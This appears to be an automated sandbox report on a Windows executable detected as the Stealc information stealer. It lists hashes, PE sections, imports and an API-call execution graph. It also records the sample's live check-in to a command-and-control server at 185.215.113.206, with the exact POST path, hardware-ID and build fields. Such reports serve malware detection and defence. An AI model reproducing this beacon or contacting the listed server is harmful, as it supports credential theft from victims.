File size: 1'813'504 bytes
MD5: 9c3907317b9374403b30537d305a9608
SHA1: cc0a6c6a0902debac4da3bad9b3eded80a503a6e
SHA256: 8f0d52b51a86a71a362bd071e2ee687c7921e0c4f32a0e96fd0ba4c9a3f568e0
SHA512: a8779fad2d12d9d5ea7afd49ce8ec7a051818f96933668715a7587bc881e3f85178ca199a0a4b307bb2d459122253390fae83058297202e0dbe281bb808121ec
SSDEEP: 49152:6zO1CVR+Mva8iZ4j7YUQ/bLrHOKUlSCgX8NgiF:6K1CVwMv5vebHHO5lSC+8qiF
TLSH: B185335D0E0A1D55C8BAB0B1AED5D6D723B8199F104D0BAB5E7FB8F6800BC9385D70E8
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
Icon Hash: 00928e8e8686b000
Entrypoint: 0xa97000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                        Instruction
                        jmp 00007FABF0CE480Ah
                        jp 00007FABF0CE4821h
                        add byte ptr [eax], al
                        jmp 00007FABF0CE6805h
                        add byte ptr [0000000Ah], al
                        add byte ptr [eax], al
                        add byte ptr [eax], dh
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add al, byte ptr [eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [0000000Ah], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax+eax*4], cl
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        push es
                        or al, byte ptr [eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319
| Name | Virtual Address | Virtual Size | Is in Section |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24b04d | 0x61 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24a000 | 0x2b0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24b1f8 | 0x8 | .idata |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                         | 0x1000 | 0x249000 | 0x16200 | 038b1e3bdf4d17cb6b002f5b65bc7552 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc | 0x24a000 | 0x2b0 | 0x200 | 6b128f6b737b31c4817b32d14316d400 | False | 0.796875 | data | 6.075277624843152 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .idata | 0x24b000 | 0x1000 | 0x200 | 0d0399d83a742d5d86c5718841e8e842 | False | 0.134765625 | data | 0.8646718654202081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                         | 0x24c000 | 0x2a9000 | 0x200 | 2b5c67d51c81ed2d1a47070fe4cf2416 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        bdmyinmd | 0x4f5000 | 0x1a1000 | 0x1a0e00 | 8572a0be72a9ab65b39abfb5a4d32c26 | False | 0.9949113333958021 | data | 7.954445428928977 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        opbnouzp | 0x696000 | 0x1000 | 0x400 | 68293240909a87fcf122189362771692 | False | 0.7431640625 | data | 5.998858203632482 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .taggant | 0x697000 | 0x3000 | 0x2200 | 8fba5ae08ab3c92c6788a7a34bdcb0c8 | False | 0.054457720588235295 | DOS executable (COM) | 0.7998543289782488 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                        RT_MANIFEST | 0x695ae8 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
                        DLL | Import
                        kernel32.dll | lstrcpy
                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                        2024-11-26T06:46:09.099061+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | TCP
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Nov 26, 2024 06:46:07.134424925 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                        Nov 26, 2024 06:46:07.254602909 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
                        Nov 26, 2024 06:46:07.254709005 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                        Nov 26, 2024 06:46:07.254863024 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                        Nov 26, 2024 06:46:07.374815941 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
                        Nov 26, 2024 06:46:08.630518913 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
                        Nov 26, 2024 06:46:08.630637884 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                        Nov 26, 2024 06:46:08.647948980 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                        Nov 26, 2024 06:46:08.767959118 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
                        Nov 26, 2024 06:46:09.098990917 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
                        Nov 26, 2024 06:46:09.099061012 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                        Nov 26, 2024 06:46:12.193181992 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                        • 185.215.113.206
                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | 2804 | C:\Users\user\Desktop\file.exe
                        Timestamp | Bytes transferred | Direction | Data

                        Nov 26, 2024 06:46:07.254863024 CET | 90 | OUT
                        GET / HTTP/1.1
                        Host: 185.215.113.206
                        Connection: Keep-Alive
                        Cache-Control: no-cache

                        Nov 26, 2024 06:46:08.630518913 CET | 203 | IN
                        HTTP/1.1 200 OK
                        Date: Tue, 26 Nov 2024 05:46:08 GMT
                        Server: Apache/2.4.41 (Ubuntu)
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8

                        Nov 26, 2024 06:46:08.647948980 CET | 411 | OUT
                        POST /c4becf79229cb002.php HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----DHIEBAAKJDHIECAAFHCA
                        Host: 185.215.113.206
                        Content-Length: 209
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Data Raw: 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 36 46 46 35 31 44 33 36 37 43 30 35 38 34 39 32 38 30 38 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 2d 2d 0d 0a
                        Data Ascii (CRLF line breaks restored from the raw bytes):
                        ------DHIEBAAKJDHIECAAFHCA
                        Content-Disposition: form-data; name="hwid"

                        C6FF51D367C058492808
                        ------DHIEBAAKJDHIECAAFHCA
                        Content-Disposition: form-data; name="build"

                        mars
                        ------DHIEBAAKJDHIECAAFHCA--

                        Nov 26, 2024 06:46:09.098990917 CET | 210 | IN
                        HTTP/1.1 200 OK
                        Date: Tue, 26 Nov 2024 05:46:08 GMT
                        Server: Apache/2.4.41 (Ubuntu)
                        Content-Length: 8
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 59 6d 78 76 59 32 73 3d
                        Data Ascii: YmxvY2s=


                        Target ID: 0
                        Start time: 00:46:03
                        Start date: 26/11/2024
                        Path: C:\Users\user\Desktop\file.exe
                        Wow64 process (32bit): true
                        Commandline: "C:\Users\user\Desktop\file.exe"
                        Imagebase: 0x700000
                        File size: 1'813'504 bytes
                        MD5 hash: 9C3907317B9374403B30537D305A9608
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2044462951.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2085798410.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation: low
                        Has exited: true


                          Execution Graph

                          Execution Coverage: 4.9%
                          Dynamic/Decrypted Code Coverage: 0%
                          Signature Coverage: 16.2%
                          Total number of Nodes: 1410
                          Total number of Limit Nodes: 28
API calls 26820->26821 26822 703f63 26821->26822 26823 704a60 2 API calls 26822->26823 26824 703f7c 26823->26824 26825 704a60 2 API calls 26824->26825 26826 703f92 26825->26826 26827 704a60 2 API calls 26826->26827 26828 703fa8 26827->26828 26829 704a60 2 API calls 26828->26829 26830 703fbe 26829->26830 26831 704a60 2 API calls 26830->26831 26832 703fd4 26831->26832 26833 704a60 2 API calls 26832->26833 26834 703fea 26833->26834 26835 704a60 2 API calls 26834->26835 26836 704003 26835->26836 26837 704a60 2 API calls 26836->26837 26838 704019 26837->26838 26839 704a60 2 API calls 26838->26839 26840 70402f 26839->26840 26841 704a60 2 API calls 26840->26841 26842 704045 26841->26842 26843 704a60 2 API calls 26842->26843 26844 70405b 26843->26844 26845 704a60 2 API calls 26844->26845 26846 704071 26845->26846 26847 704a60 2 API calls 26846->26847 26848 70408a 26847->26848 26849 704a60 2 API calls 26848->26849 26850 7040a0 26849->26850 26851 704a60 2 API calls 26850->26851 26852 7040b6 26851->26852 26853 704a60 2 API calls 26852->26853 26854 7040cc 26853->26854 26855 704a60 2 API calls 26854->26855 26856 7040e2 26855->26856 26857 704a60 2 API calls 26856->26857 26858 7040f8 26857->26858 26859 704a60 2 API calls 26858->26859 26860 704111 26859->26860 26861 704a60 2 API calls 26860->26861 26862 704127 26861->26862 26863 704a60 2 API calls 26862->26863 26864 70413d 26863->26864 26865 704a60 2 API calls 26864->26865 26866 704153 26865->26866 26867 704a60 2 API calls 26866->26867 26868 704169 26867->26868 26869 704a60 2 API calls 26868->26869 26870 70417f 26869->26870 26871 704a60 2 API calls 26870->26871 26872 704198 26871->26872 26873 704a60 2 API calls 26872->26873 26874 7041ae 26873->26874 26875 704a60 2 API calls 26874->26875 26876 7041c4 26875->26876 26877 704a60 2 API calls 26876->26877 26878 7041da 26877->26878 26879 704a60 2 API calls 26878->26879 26880 7041f0 26879->26880 26881 704a60 2 API calls 26880->26881 26882 704206 26881->26882 26883 704a60 2 API calls 
26882->26883 26884 70421f 26883->26884 26885 704a60 2 API calls 26884->26885 26886 704235 26885->26886 26887 704a60 2 API calls 26886->26887 26888 70424b 26887->26888 26889 704a60 2 API calls 26888->26889 26890 704261 26889->26890 26891 704a60 2 API calls 26890->26891 26892 704277 26891->26892 26893 704a60 2 API calls 26892->26893 26894 70428d 26893->26894 26895 704a60 2 API calls 26894->26895 26896 7042a6 26895->26896 26897 704a60 2 API calls 26896->26897 26898 7042bc 26897->26898 26899 704a60 2 API calls 26898->26899 26900 7042d2 26899->26900 26901 704a60 2 API calls 26900->26901 26902 7042e8 26901->26902 26903 704a60 2 API calls 26902->26903 26904 7042fe 26903->26904 26905 704a60 2 API calls 26904->26905 26906 704314 26905->26906 26907 704a60 2 API calls 26906->26907 26908 70432d 26907->26908 26909 704a60 2 API calls 26908->26909 26910 704343 26909->26910 26911 704a60 2 API calls 26910->26911 26912 704359 26911->26912 26913 704a60 2 API calls 26912->26913 26914 70436f 26913->26914 26915 704a60 2 API calls 26914->26915 26916 704385 26915->26916 26917 704a60 2 API calls 26916->26917 26918 70439b 26917->26918 26919 704a60 2 API calls 26918->26919 26920 7043b4 26919->26920 26921 704a60 2 API calls 26920->26921 26922 7043ca 26921->26922 26923 704a60 2 API calls 26922->26923 26924 7043e0 26923->26924 26925 704a60 2 API calls 26924->26925 26926 7043f6 26925->26926 26927 704a60 2 API calls 26926->26927 26928 70440c 26927->26928 26929 704a60 2 API calls 26928->26929 26930 704422 26929->26930 26931 704a60 2 API calls 26930->26931 26932 70443b 26931->26932 26933 704a60 2 API calls 26932->26933 26934 704451 26933->26934 26935 704a60 2 API calls 26934->26935 26936 704467 26935->26936 26937 704a60 2 API calls 26936->26937 26938 70447d 26937->26938 26939 704a60 2 API calls 26938->26939 26940 704493 26939->26940 26941 704a60 2 API calls 26940->26941 26942 7044a9 26941->26942 26943 704a60 2 API calls 26942->26943 26944 7044c2 26943->26944 26945 704a60 2 API calls 26944->26945 
26946 7044d8 26945->26946 26947 704a60 2 API calls 26946->26947 26948 7044ee 26947->26948 26949 704a60 2 API calls 26948->26949 26950 704504 26949->26950 26951 704a60 2 API calls 26950->26951 26952 70451a 26951->26952 26953 704a60 2 API calls 26952->26953 26954 704530 26953->26954 26955 704a60 2 API calls 26954->26955 26956 704549 26955->26956 26957 704a60 2 API calls 26956->26957 26958 70455f 26957->26958 26959 704a60 2 API calls 26958->26959 26960 704575 26959->26960 26961 704a60 2 API calls 26960->26961 26962 70458b 26961->26962 26963 704a60 2 API calls 26962->26963 26964 7045a1 26963->26964 26965 704a60 2 API calls 26964->26965 26966 7045b7 26965->26966 26967 704a60 2 API calls 26966->26967 26968 7045d0 26967->26968 26969 704a60 2 API calls 26968->26969 26970 7045e6 26969->26970 26971 704a60 2 API calls 26970->26971 26972 7045fc 26971->26972 26973 704a60 2 API calls 26972->26973 26974 704612 26973->26974 26975 704a60 2 API calls 26974->26975 26976 704628 26975->26976 26977 704a60 2 API calls 26976->26977 26978 70463e 26977->26978 26979 704a60 2 API calls 26978->26979 26980 704657 26979->26980 26981 704a60 2 API calls 26980->26981 26982 70466d 26981->26982 26983 704a60 2 API calls 26982->26983 26984 704683 26983->26984 26985 704a60 2 API calls 26984->26985 26986 704699 26985->26986 26987 704a60 2 API calls 26986->26987 26988 7046af 26987->26988 26989 704a60 2 API calls 26988->26989 26990 7046c5 26989->26990 26991 704a60 2 API calls 26990->26991 26992 7046de 26991->26992 26993 704a60 2 API calls 26992->26993 26994 7046f4 26993->26994 26995 704a60 2 API calls 26994->26995 26996 70470a 26995->26996 26997 704a60 2 API calls 26996->26997 26998 704720 26997->26998 26999 704a60 2 API calls 26998->26999 27000 704736 26999->27000 27001 704a60 2 API calls 27000->27001 27002 70474c 27001->27002 27003 704a60 2 API calls 27002->27003 27004 704765 27003->27004 27005 704a60 2 API calls 27004->27005 27006 70477b 27005->27006 27007 704a60 2 API calls 27006->27007 27008 704791 
27007->27008 27009 704a60 2 API calls 27008->27009 27010 7047a7 27009->27010 27011 704a60 2 API calls 27010->27011 27012 7047bd 27011->27012 27013 704a60 2 API calls 27012->27013 27014 7047d3 27013->27014 27015 704a60 2 API calls 27014->27015 27016 7047ec 27015->27016 27017 704a60 2 API calls 27016->27017 27018 704802 27017->27018 27019 704a60 2 API calls 27018->27019 27020 704818 27019->27020 27021 704a60 2 API calls 27020->27021 27022 70482e 27021->27022 27023 704a60 2 API calls 27022->27023 27024 704844 27023->27024 27025 704a60 2 API calls 27024->27025 27026 70485a 27025->27026 27027 704a60 2 API calls 27026->27027 27028 704873 27027->27028 27029 704a60 2 API calls 27028->27029 27030 704889 27029->27030 27031 704a60 2 API calls 27030->27031 27032 70489f 27031->27032 27033 704a60 2 API calls 27032->27033 27034 7048b5 27033->27034 27035 704a60 2 API calls 27034->27035 27036 7048cb 27035->27036 27037 704a60 2 API calls 27036->27037 27038 7048e1 27037->27038 27039 704a60 2 API calls 27038->27039 27040 7048fa 27039->27040 27041 704a60 2 API calls 27040->27041 27042 704910 27041->27042 27043 704a60 2 API calls 27042->27043 27044 704926 27043->27044 27045 704a60 2 API calls 27044->27045 27046 70493c 27045->27046 27047 704a60 2 API calls 27046->27047 27048 704952 27047->27048 27049 704a60 2 API calls 27048->27049 27050 704968 27049->27050 27051 704a60 2 API calls 27050->27051 27052 704981 27051->27052 27053 704a60 2 API calls 27052->27053 27054 704997 27053->27054 27055 704a60 2 API calls 27054->27055 27056 7049ad 27055->27056 27057 704a60 2 API calls 27056->27057 27058 7049c3 27057->27058 27059 704a60 2 API calls 27058->27059 27060 7049d9 27059->27060 27061 704a60 2 API calls 27060->27061 27062 7049ef 27061->27062 27063 704a60 2 API calls 27062->27063 27064 704a08 27063->27064 27065 704a60 2 API calls 27064->27065 27066 704a1e 27065->27066 27067 704a60 2 API calls 27066->27067 27068 704a34 27067->27068 27069 704a60 2 API calls 27068->27069 27070 704a4a 27069->27070 
27071 7266e0 27070->27071 27072 726afe 8 API calls 27071->27072 27073 7266ed 43 API calls 27071->27073 27074 726b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27072->27074 27075 726c08 27072->27075 27073->27072 27074->27075 27076 726cd2 27075->27076 27077 726c15 8 API calls 27075->27077 27078 726cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27076->27078 27079 726d4f 27076->27079 27077->27076 27078->27079 27080 726de9 27079->27080 27081 726d5c 6 API calls 27079->27081 27082 726f10 27080->27082 27083 726df6 12 API calls 27080->27083 27081->27080 27084 726f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27082->27084 27085 726f8d 27082->27085 27083->27082 27084->27085 27086 726fc1 27085->27086 27087 726f96 GetProcAddress GetProcAddress 27085->27087 27088 726ff5 27086->27088 27089 726fca GetProcAddress GetProcAddress 27086->27089 27087->27086 27090 727002 10 API calls 27088->27090 27091 7270ed 27088->27091 27089->27088 27090->27091 27092 727152 27091->27092 27093 7270f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27091->27093 27094 72715b GetProcAddress 27092->27094 27095 72716e 27092->27095 27093->27092 27094->27095 27096 72051f 27095->27096 27097 727177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27095->27097 27098 701530 27096->27098 27097->27096 27407 701610 27098->27407 27100 70153b 27101 701555 lstrcpy 27100->27101 27102 70155d 27100->27102 27101->27102 27103 701577 lstrcpy 27102->27103 27104 70157f 27102->27104 27103->27104 27105 701599 lstrcpy 27104->27105 27107 7015a1 27104->27107 27105->27107 27106 701605 27109 71f1b0 lstrlen 27106->27109 27107->27106 27108 7015fd lstrcpy 27107->27108 27108->27106 27110 71f1e4 27109->27110 27111 71f1f7 lstrlen 27110->27111 27112 71f1eb lstrcpy 27110->27112 27113 71f208 27111->27113 27112->27111 27114 71f21b lstrlen 27113->27114 27115 71f20f lstrcpy 27113->27115 27116 71f22c 27114->27116 27115->27114 
27117 71f233 lstrcpy 27116->27117 27118 71f23f 27116->27118 27117->27118 27119 71f258 lstrcpy 27118->27119 27120 71f264 27118->27120 27119->27120 27121 71f286 lstrcpy 27120->27121 27122 71f292 27120->27122 27121->27122 27123 71f2ba lstrcpy 27122->27123 27124 71f2c6 27122->27124 27123->27124 27125 71f2ea lstrcpy 27124->27125 27175 71f300 27124->27175 27125->27175 27126 71f30c lstrlen 27126->27175 27127 71f4b9 lstrcpy 27127->27175 27128 71f3a1 lstrcpy 27128->27175 27129 71f3c5 lstrcpy 27129->27175 27130 71f4e8 lstrcpy 27191 71f4f0 27130->27191 27131 71f479 lstrcpy 27131->27175 27132 71f70f StrCmpCA 27138 71fe8e 27132->27138 27132->27175 27133 71f616 StrCmpCA 27133->27132 27133->27191 27134 71f59c lstrcpy 27134->27191 27135 71fa29 StrCmpCA 27147 71fe2b 27135->27147 27135->27175 27136 71f73e lstrlen 27136->27175 27137 71fd4d StrCmpCA 27141 71fd60 Sleep 27137->27141 27152 71fd75 27137->27152 27139 71fead lstrlen 27138->27139 27140 71fea5 lstrcpy 27138->27140 27145 71fec7 27139->27145 27140->27139 27141->27175 27142 71fa58 lstrlen 27142->27175 27143 71f64a lstrcpy 27143->27191 27144 701530 8 API calls 27144->27191 27150 71fee7 lstrlen 27145->27150 27155 71fedf lstrcpy 27145->27155 27146 71fe4a lstrlen 27154 71fe64 27146->27154 27147->27146 27148 71fe42 lstrcpy 27147->27148 27148->27146 27149 71f89e lstrcpy 27149->27175 27158 71ff01 27150->27158 27151 71fd94 lstrlen 27167 71fdae 27151->27167 27152->27151 27156 71fd8c lstrcpy 27152->27156 27153 71f76f lstrcpy 27153->27175 27160 71fdce lstrlen 27154->27160 27162 71fe7c lstrcpy 27154->27162 27155->27150 27156->27151 27157 71fbb8 lstrcpy 27157->27175 27166 71ff21 27158->27166 27170 71ff19 lstrcpy 27158->27170 27159 71fa89 lstrcpy 27159->27175 27169 71fde8 27160->27169 27161 71f8cd lstrcpy 27161->27191 27162->27160 27163 71f791 lstrcpy 27163->27175 27165 701530 8 API calls 27165->27175 27171 701610 4 API calls 27166->27171 27167->27160 27174 71fdc6 lstrcpy 27167->27174 27168 71fbe7 lstrcpy 27168->27191 27177 71fe08 
27169->27177 27179 71fe00 lstrcpy 27169->27179 27170->27166 27193 71fe13 27171->27193 27172 71faab lstrcpy 27172->27175 27173 71f698 lstrcpy 27173->27191 27174->27160 27175->27126 27175->27127 27175->27128 27175->27129 27175->27130 27175->27131 27175->27132 27175->27135 27175->27136 27175->27137 27175->27142 27175->27149 27175->27153 27175->27157 27175->27159 27175->27161 27175->27163 27175->27165 27175->27168 27175->27172 27176 71ee90 28 API calls 27175->27176 27181 71f7e2 lstrcpy 27175->27181 27184 71fafc lstrcpy 27175->27184 27175->27191 27176->27175 27180 701610 4 API calls 27177->27180 27178 71efb0 35 API calls 27178->27191 27179->27177 27180->27193 27181->27175 27182 71f924 lstrcpy 27182->27191 27183 71f99e StrCmpCA 27183->27135 27183->27191 27184->27175 27185 71fc3e lstrcpy 27185->27191 27186 71fcb8 StrCmpCA 27186->27137 27186->27191 27187 71f9cb lstrcpy 27187->27191 27188 71fce9 lstrcpy 27188->27191 27189 71ee90 28 API calls 27189->27191 27190 71fa19 lstrcpy 27190->27191 27191->27133 27191->27134 27191->27135 27191->27137 27191->27143 27191->27144 27191->27173 27191->27175 27191->27178 27191->27182 27191->27183 27191->27185 27191->27186 27191->27187 27191->27188 27191->27189 27191->27190 27192 71fd3a lstrcpy 27191->27192 27192->27191 27193->26217 27195 722785 27194->27195 27196 72278c GetVolumeInformationA 27194->27196 27195->27196 27197 7227ec GetProcessHeap RtlAllocateHeap 27196->27197 27199 722822 27197->27199 27200 722826 wsprintfA 27197->27200 27417 7271e0 27199->27417 27200->27199 27204 704c70 27203->27204 27205 704c85 27204->27205 27206 704c7d lstrcpy 27204->27206 27421 704bc0 27205->27421 27206->27205 27208 704c90 27209 704ccc lstrcpy 27208->27209 27210 704cd8 27208->27210 27209->27210 27211 704cff lstrcpy 27210->27211 27212 704d0b 27210->27212 27211->27212 27213 704d2f lstrcpy 27212->27213 27214 704d3b 27212->27214 27213->27214 27215 704d6d lstrcpy 27214->27215 27216 704d79 27214->27216 27215->27216 27217 704da0 lstrcpy 27216->27217 27218 704dac 
InternetOpenA StrCmpCA 27216->27218 27217->27218 27219 704de0 27218->27219 27220 7054b8 InternetCloseHandle CryptStringToBinaryA 27219->27220 27425 723e70 27219->27425 27221 7054e8 LocalAlloc 27220->27221 27238 7055d8 27220->27238 27223 7054ff CryptStringToBinaryA 27221->27223 27221->27238 27224 705517 LocalFree 27223->27224 27225 705529 lstrlen 27223->27225 27224->27238 27226 70553d 27225->27226 27228 705563 lstrlen 27226->27228 27229 705557 lstrcpy 27226->27229 27227 704dfa 27230 704e23 lstrcpy lstrcat 27227->27230 27231 704e38 27227->27231 27233 70557d 27228->27233 27229->27228 27230->27231 27232 704e5a lstrcpy 27231->27232 27235 704e62 27231->27235 27232->27235 27234 70558f lstrcpy lstrcat 27233->27234 27236 7055a2 27233->27236 27234->27236 27237 704e71 lstrlen 27235->27237 27240 7055d1 27236->27240 27241 7055c9 lstrcpy 27236->27241 27239 704e89 27237->27239 27238->26246 27242 704e95 lstrcpy lstrcat 27239->27242 27243 704eac 27239->27243 27240->27238 27241->27240 27242->27243 27244 704ed5 27243->27244 27245 704ecd lstrcpy 27243->27245 27246 704edc lstrlen 27244->27246 27245->27244 27247 704ef2 27246->27247 27248 704efe lstrcpy lstrcat 27247->27248 27249 704f15 27247->27249 27248->27249 27250 704f36 lstrcpy 27249->27250 27251 704f3e 27249->27251 27250->27251 27252 704f65 lstrcpy lstrcat 27251->27252 27253 704f7b 27251->27253 27252->27253 27254 704fa4 27253->27254 27255 704f9c lstrcpy 27253->27255 27256 704fab lstrlen 27254->27256 27255->27254 27257 704fc1 27256->27257 27258 704fcd lstrcpy lstrcat 